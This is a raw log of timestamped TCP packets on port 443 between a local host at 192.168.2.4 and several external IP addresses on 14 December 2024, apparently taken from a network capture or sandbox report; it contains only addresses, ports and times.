                                                            Dec 14, 2024 10:10:19.495599985 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.495632887 CET44349757104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:19.499125004 CET44349757104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:19.499341965 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.499624968 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.499624968 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.499625921 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.499826908 CET44349757104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:19.499890089 CET49757443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.499947071 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.499980927 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:19.500049114 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.500216961 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:19.500226974 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:19.627861977 CET44349758172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:19.652036905 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.652061939 CET44349758172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:19.654465914 CET44349758172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:19.654541969 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.654942036 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.654959917 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.655003071 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.655014992 CET44349758172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:19.655064106 CET49758443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.655409098 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.655455112 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:19.655535936 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.655700922 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:19.655725002 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:20.718990088 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:20.719482899 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:20.719508886 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:20.722558022 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:20.722747087 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:20.723257065 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:20.723328114 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:20.723337889 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:20.723364115 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:20.771073103 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:20.771094084 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:20.817945004 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:20.867733955 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:20.867985010 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:20.868017912 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:20.869457006 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:20.869590044 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:20.869865894 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:20.869950056 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:20.869996071 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:20.911807060 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:20.911838055 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:20.958633900 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:21.305509090 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:21.305680037 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:21.305738926 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:21.306112051 CET49761443192.168.2.4172.67.211.247
                                                            Dec 14, 2024 10:10:21.306132078 CET44349761172.67.211.247192.168.2.4
                                                            Dec 14, 2024 10:10:21.725513935 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:21.725689888 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:21.725758076 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:21.726896048 CET49760443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:21.726913929 CET44349760104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:36.428746939 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:36.428836107 CET44349763104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:36.428886890 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:36.428934097 CET44349764104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:36.428983927 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:36.429080009 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:36.429254055 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:36.429308891 CET44349763104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:36.429577112 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:36.429593086 CET44349764104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.645924091 CET44349763104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.646440029 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.646502972 CET44349763104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.650077105 CET44349763104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.650171041 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.650500059 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.650541067 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.650561094 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.650613070 CET44349763104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.650675058 CET49763443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.650830984 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.650913954 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.650990963 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.651176929 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.651202917 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.654331923 CET44349764104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.654530048 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.654587984 CET44349764104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.658138037 CET44349764104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.658209085 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658462048 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658462048 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658500910 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658648968 CET44349764104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.658648968 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658710003 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:37.658782959 CET49764443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658821106 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.658977032 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:37.659006119 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.868288040 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.869647026 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.869709969 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.871629000 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.871835947 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.872258902 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.872260094 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.872344017 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.872423887 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.914937019 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.914999008 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.961946964 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.972728968 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.973022938 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.973069906 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.974509954 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:38.974587917 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.974868059 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:38.974952936 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:39.025434971 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.025455952 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:39.072909117 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.304034948 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:39.304284096 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:39.304460049 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.304543018 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.304586887 CET44349765104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:39.304616928 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.304651022 CET49765443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.306077003 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:39.351349115 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.177206039 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.184128046 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.184216976 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.184223890 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.184259892 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.184312105 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.192001104 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.197737932 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.197817087 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.197833061 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.204777956 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.204847097 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.204860926 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.251554012 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.251571894 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.297431946 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.297446012 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.344017982 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.344031096 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.371392965 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.371462107 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.371484995 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.379695892 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.379750013 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.379764080 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.381269932 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.381330967 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.381536961 CET49766443192.168.2.4104.21.67.40
                                                            Dec 14, 2024 10:10:40.381567955 CET44349766104.21.67.40192.168.2.4
                                                            Dec 14, 2024 10:10:40.524205923 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:40.524259090 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:40.524332047 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:40.524497986 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:40.524511099 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:40.524755955 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:40.524841070 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:40.524933100 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:40.525120020 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:40.525160074 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:40.525444984 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:40.525531054 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:40.525604010 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:40.525753975 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:40.525779009 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:41.746717930 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:41.746998072 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:41.747014046 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:41.748681068 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:41.748847961 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:41.749789000 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:41.749872923 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:41.749950886 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:41.749959946 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:41.764137030 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:41.764393091 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:41.764473915 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:41.766064882 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:41.766144037 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:41.766997099 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:41.767096996 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:41.767148972 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:41.768574953 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:41.768728971 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:41.768789053 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:41.770426989 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:41.770498991 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:41.775773048 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:41.775871038 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:41.775907040 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:41.806737900 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:41.806874037 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:41.806934118 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:41.819360971 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:41.822845936 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:41.822923899 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:41.853158951 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:41.868304014 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:42.172785997 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.203546047 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.208677053 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.208858013 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.208921909 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.215006113 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.215069056 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.215087891 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.221311092 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.221369028 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.221383095 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.227535963 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.227648020 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.227710009 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.227724075 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.238732100 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.238795042 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.238807917 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.239047050 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:42.239186049 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:42.239252090 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:42.239743948 CET49768443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:42.239787102 CET44349768104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:42.241009951 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:42.241055965 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:42.241127014 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:42.241337061 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:42.241369009 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:42.286564112 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.296875000 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.296899080 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.296935081 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.296943903 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.296963930 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.296966076 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.296988010 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.296993971 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.296999931 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.297013044 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.297044039 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.297065020 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.322905064 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.372502089 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.390849113 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.396739006 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.396821976 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.396884918 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.413727999 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.413753033 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.413794041 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.413794994 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.413824081 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.413825035 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.413845062 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.413845062 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.413882017 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.422169924 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.422224998 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.422244072 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.434197903 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.434297085 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.434386015 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.434451103 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.434509993 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.445425987 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.458081961 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.458153963 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.458163977 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.458219051 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.458278894 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.464294910 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.483078003 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.483097076 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.483143091 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.483171940 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.483187914 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.483191013 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.483201981 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.483227968 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.483252048 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.489403963 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.489458084 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.489475965 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.495759964 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.495812893 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.495826960 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.508146048 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.508200884 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.508214951 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.512454033 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.512516022 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.512528896 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.559595108 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.585683107 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.585843086 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.585930109 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.585992098 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.586083889 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.586144924 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.586658955 CET49769443192.168.2.4104.17.25.14
                                                            Dec 14, 2024 10:10:42.586685896 CET44349769104.17.25.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.595217943 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.595277071 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.595290899 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.595304012 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.595345974 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.595356941 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.625050068 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.625072956 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.625116110 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.625121117 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.625148058 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.625166893 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.637242079 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.637321949 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.637329102 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.637378931 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.637415886 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.637840986 CET49767443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.637855053 CET44349767151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.728816032 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:42.728900909 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.728991032 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:42.729173899 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:42.729211092 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:42.783934116 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.784024954 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:42.784097910 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.784316063 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:42.784339905 CET44349772151.101.66.137192.168.2.4
